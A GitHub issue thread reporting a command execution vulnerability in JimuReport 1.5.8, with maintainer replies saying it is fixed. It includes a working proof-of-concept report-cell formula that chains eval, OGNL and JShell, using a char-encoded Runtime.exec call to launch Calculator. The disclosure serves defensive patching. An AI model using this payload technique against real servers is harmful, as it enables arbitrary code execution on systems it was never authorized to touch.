### ISSUE TITLE
A Potential Security Issue in JimuReport 

### ISSUE THREAD

**Issue by cokeBeer** [jeecgboot/jeecg-boot#5041]
##### 版本号：
jimureport-springboot-starter 1.5.8 (lastest) 

##### 前端版本：vue3版？还是 vue2版？
vue3

##### 问题描述：
Hi, I found a potential security issue in JimuReport, which **may** lead to **comand execution**.
<img width="793" alt="image" src="https://github.com/jeecgboot/jeecg-boot/assets/70683161/e1808a3f-7f25-4f04-9822-0356f9c34f25">

##### 截图&代码：
0. Prepare environment
```
jimureport-springboot-starter 1.5.8
jdk9+
```
1. Start jimureport
<img width="766" alt="image" src="https://github.com/jeecgboot/JimuReport/assets/70683161/4382d198-af4c-478e-b8e1-d4c3d72659bf">

2. Click "新建报表" to create a new report,  edit a cell as below:
<img width="1513" alt="image" src="https://github.com/jeecgboot/JimuReport/assets/70683161/2804fcf1-ecde-47f2-bee0-3c1aac85e301">

The value is:

```
=eval("c=Class.forName('ognl.Ognl');c.getValue(\"@jdk.jshell.JShell@create().eval(new String (new char[]{106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,34,111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112,34,41}))\",new Object())")
```
3. Click "保存" and "预览", you will see a Calculator pop out, proving that the comand is executed.

**Comment by zhangdaiscott** [comment]
ws

**Comment by 1298191366** [comment]
已修复，待新版本发布
